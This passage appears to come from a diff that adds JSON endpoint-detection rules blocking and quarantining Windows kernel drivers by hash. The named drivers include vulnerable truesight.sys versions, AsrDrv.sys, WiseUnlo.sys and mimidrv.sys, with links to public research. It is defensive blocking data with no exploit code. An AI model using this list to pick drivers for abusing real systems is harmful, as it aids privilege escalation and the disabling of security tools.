1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819999Z", + "creation_date": "2026-03-23T11:45:31.820003Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820011Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65799df3a3d3ba7f529daba403ee6c8f5240b6194822266a0fc8f439bb1fdd62", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"e98b5d01-ec84-5f96-b279-7761d63cb762", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160065Z", + "creation_date": "2026-03-23T11:45:31.160067Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160072Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7f81fb6afd180e9005b0c8dd178181a296952aab5e3b56c21597924c957edaa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e99216f8-ddb9-58a5-97eb-5fc46a15dad3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976210Z", + "creation_date": "2026-03-23T11:45:29.976212Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.976218Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e99e5531-9025-5a1b-a59c-96b250bf1eeb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835085Z", + "creation_date": "2026-03-23T11:45:30.835088Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835097Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8db11ff4f0fbcf58ad118aefcc186ea7b273eefa9b537eee1ec92f0231c44e30", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9a9c7af-9563-5ecd-badb-3ddae8aad830", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829154Z", + "creation_date": "2026-03-23T11:45:31.829157Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829166Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9103c9085a372f4e2a09da45ff210a8096b7dc0c404719504ebf74f009e5deb0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9ac3a0a-e472-5549-9751-dd0c37185db5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822326Z", + "creation_date": "2026-03-23T11:45:31.822328Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822334Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "8c827affab0c51c6388453fd855c304358a95e3b9fa4ca9101315169cde72d69", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9b1fad4-f066-5e1f-adb4-50fdc9f69e93", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982964Z", + "creation_date": "2026-03-23T11:45:29.982966Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982971Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "daf549a7080d384ba99d1b5bd2383dbb1aa640f7ea3a216df1f08981508155f5", + "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9b7835a-4ac1-5afb-8071-059bbc53e8a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477548Z", + "creation_date": "2026-03-23T11:45:31.477552Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477562Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa76f8a295e5013e85b3c8de9b8a4e5ca6052fffcf119a4c0be03743bba8221d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9be632e-3671-57ba-ad85-dfd3b2c68f6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819262Z", + "creation_date": "2026-03-23T11:45:31.819264Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819273Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a532a1c1a6177ee75f189805855c15965e689140f2acc14ed4f81a8b82a9869", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9d591b1-63b1-5b02-b5e2-dff6e1d5c554", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147639Z", + "creation_date": "2026-03-23T11:45:31.147641Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147646Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1821221fdd3984994974e6001eda4afbc6ef07e05206587a48cbd9b6d787f220", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9d7c94d-fd73-50d4-94d7-6d8792e69d05", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.148329Z", + "creation_date": "2026-03-23T11:45:31.148331Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148337Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "efc3fc8e98ffdc26239f584632c6c8c0ecdec9eb02e4e19ae126c153986bf5b8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9e79f64-0c08-5f11-953f-b5f6812ffba2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464480Z", + "creation_date": "2026-03-23T11:45:30.464483Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464491Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d42678df3917c37f44a1506307f1677b9a689efcf350b1acce7e6f64b514905", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"e9e812b3-1427-5331-a84b-a55e4de5673f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815763Z", + "creation_date": "2026-03-23T11:45:31.815766Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815772Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f96fb7c3a57c6efeb394f119d6965cceb9c58ec395671d12787f48389c0d676", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9e9709e-0569-54b5-83e0-2ff5ae467c67", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.158935Z", + "creation_date": "2026-03-23T11:45:31.158937Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.158943Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1cbcb6ed0338f536d264cd4e851f1e34a84e733cc4d60519c416142f0b5982c7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9f0ab3a-6209-5be8-94e3-4e17f969d091", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152960Z", + "creation_date": "2026-03-23T11:45:31.152963Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152971Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7bd2dd16cd005368abcea9c6f457853ab46a153d058b909f135394d48a3e399f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9f3f13c-4d62-5364-86ec-f9858a7f1ef3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476468Z", + "creation_date": "2026-03-23T11:45:31.476471Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476481Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c1035795567d03236901340505b79a4dd1a7619dc22740a2f6a667ff53249248", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e9f7f05a-8b8b-5cbd-9a45-7310d0336d63", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982659Z", + "creation_date": "2026-03-23T11:45:29.982661Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982667Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "448a507774886c1745beaa86cd0867d93f142f5d2b58d452c5a8250d93359779", + "comment": "Malicious Kernel Driver (aka wantd_5.sys) [https://www.loldrivers.io/drivers/3277cecc-f4b4-4a00-be01-9da83e013bcd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea04c9ef-ec1f-572e-8253-2c686726e25e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819908Z", + "creation_date": "2026-03-23T11:45:31.819911Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819919Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dbc2599da29472e0d376ee3dcd887d3b6eaedddd028f0a7eb22e78185d156ebc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea04d2f9-91af-56b9-91cf-a9e326868140", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462555Z", + "creation_date": "2026-03-23T11:45:30.462559Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462568Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d03a01257e156a3a018230059052791c3cde556e5cec7a4dd2f55f65c06e146", + "comment": "Vulnerable Kernel Driver (aka AsrDrv.sys) [https://www.loldrivers.io/drivers/213676bb-ffb9-4d0d-a442-8cefee63acc1/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea18466c-3020-5fcf-93ce-2927f5a8a946", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823283Z", + "creation_date": "2026-03-23T11:45:31.823286Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823294Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ef85f011947ad77f258a42705c392e9ad9de97e7b4f69f91fb124230e9218bb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea1d568f-49c2-5386-998c-4d2c97bdd9a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141006Z", + "creation_date": "2026-03-23T11:45:31.141008Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141014Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c292ad99577e588b0c252a171b5fd1e708c5f29f2625cb9c2c91077ef768e2a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea1f40be-64ac-5685-971e-b4ba12436268", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828668Z", + "creation_date": 
"2026-03-23T11:45:30.828670Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828675Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d4e9ba2a651657a68ee5b97e3f648e2b3670eea824edf5a07eb39c1a6dc4beb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea21a4cc-4d9c-589c-8ab9-284c5d2fdd35", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618390Z", + "creation_date": "2026-03-23T11:45:29.618392Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618398Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "84df20b1d9d87e305c92e5ffae21b10b325609d59d835a954dbd8750ef5dabf4", + "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea2367f4-d834-5ab0-81ed-89f0fe314e67", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459793Z", + "creation_date": "2026-03-23T11:45:30.459797Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459805Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7fba2584bb4fb801f322e3a63253ffac36a76d9dc5f0a4747746b0791e2a0d0b", + "comment": "Vulnerable Kernel Driver (aka Driver7.sys) [https://www.loldrivers.io/drivers/9ca73d04-3349-4c16-9384-94c43335a031/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ea3824d0-459e-522e-80a7-8600ae511bbb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477490Z", + "creation_date": "2026-03-23T11:45:30.477493Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477502Z", + "rule_level": null, + 
